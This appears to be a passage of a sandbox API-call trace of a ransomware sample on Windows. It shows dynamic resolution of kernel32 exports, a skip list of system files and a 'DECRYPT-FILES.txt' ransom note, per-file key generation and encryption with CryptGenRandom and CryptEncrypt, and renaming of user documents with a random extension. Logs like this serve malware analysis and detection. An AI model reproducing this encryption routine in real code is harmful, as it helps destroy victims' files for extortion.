[0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.803] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.803] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.803] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.803] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.803] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.803] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.804] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.804] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.804] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.804] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.804] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.804] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.804] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.804] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.804] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.804] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.804] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.804] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.804] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.804] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.804] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.804] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.804] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.804] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.804] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.805] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.805] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.805] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.805] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.805] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.805] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.805] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.805] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.805] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.805] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.805] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.805] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.805] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.805] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.805] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.805] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.805] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.805] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.805] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.806] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.806] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.806] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.806] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.806] lstrlenA (lpString="DELETEATOM") returned 10 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.806] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.806] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.806] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.806] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.806] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.806] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.806] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.806] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.806] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.806] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.806] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.806] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.806] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.806] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.807] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.807] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.807] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.807] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.807] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.807] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.807] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.807] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.807] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.807] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.807] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.807] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.807] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.807] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.807] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.807] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.807] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.807] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.807] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.808] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.808] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.808] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.808] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.808] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.808] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.808] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.808] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.808] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.808] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.808] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.808] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx") returned 77 [0084.808] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx.aOhK") returned 82 [0084.808] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\xejzjaz6j g_ckr.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\xejZJaZ6j G_Ckr.pptx.aOhK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\xejzjaz6j g_ckr.pptx.aohk"), dwFlags=0x0) returned 1 [0084.809] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.809] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.809] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.810] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x656f2540, ftCreationTime.dwHighDateTime=0x1d4ca34, ftLastAccessTime.dwLowDateTime=0x6ab21a80, ftLastAccessTime.dwHighDateTime=0x1d4d146, ftLastWriteTime.dwLowDateTime=0x6ab21a80, ftLastWriteTime.dwHighDateTime=0x1d4d146, nFileSizeHigh=0x0, nFileSizeLow=0x154ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="YeFEah28pGy.pdf", cAlternateFileName="YEFEAH~1.PDF")) returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="DECRYPT-FILES.txt") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="autorun.inf") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="boot.ini") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="desktop.ini") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="ntuser.dat") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="iconcache.db") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="bootsect.bak") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="ntuser.dat.log") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="thumbs.db") returned 1 [0084.810] lstrcmpiW (lpString1="YeFEah28pGy.pdf", lpString2="Bootfont.bin") returned 1 [0084.810] lstrlenW (lpString="YeFEah28pGy.pdf") returned 15 [0084.810] lstrcmpiW (lpString1="pdf", lpString2="lnk") returned 1 [0084.810] lstrcmpiW (lpString1="pdf", lpString2="exe") returned 1 [0084.810] lstrcmpiW (lpString1="pdf", lpString2="sys") returned -1 [0084.810] lstrcmpiW (lpString1="pdf", lpString2="dll") returned 1 [0084.810] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0084.810] lstrlenW (lpString="YeFEah28pGy.pdf") returned 15 [0084.810] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0084.810] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="YeFEah28pGy.pdf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf" [0084.810] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\yefeah28pgy.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0084.811] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=87278) returned 1 [0084.811] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0084.811] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.811] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.811] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.811] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.811] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0084.811] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.813] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.813] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.814] CloseHandle (hObject=0x42c) returned 1 [0084.814] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.814] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0084.815] CloseHandle (hObject=0x0) returned 0 [0084.815] CloseHandle (hObject=0x428) returned 1 [0084.815] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.816] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.816] GetTickCount () returned 0x114daa6 [0084.816] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.816] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.816] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.816] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.817] lstrlenA (lpString="kernel32.dll") returned 12 [0084.817] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.817] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.817] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.817] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.817] lstrcpyA 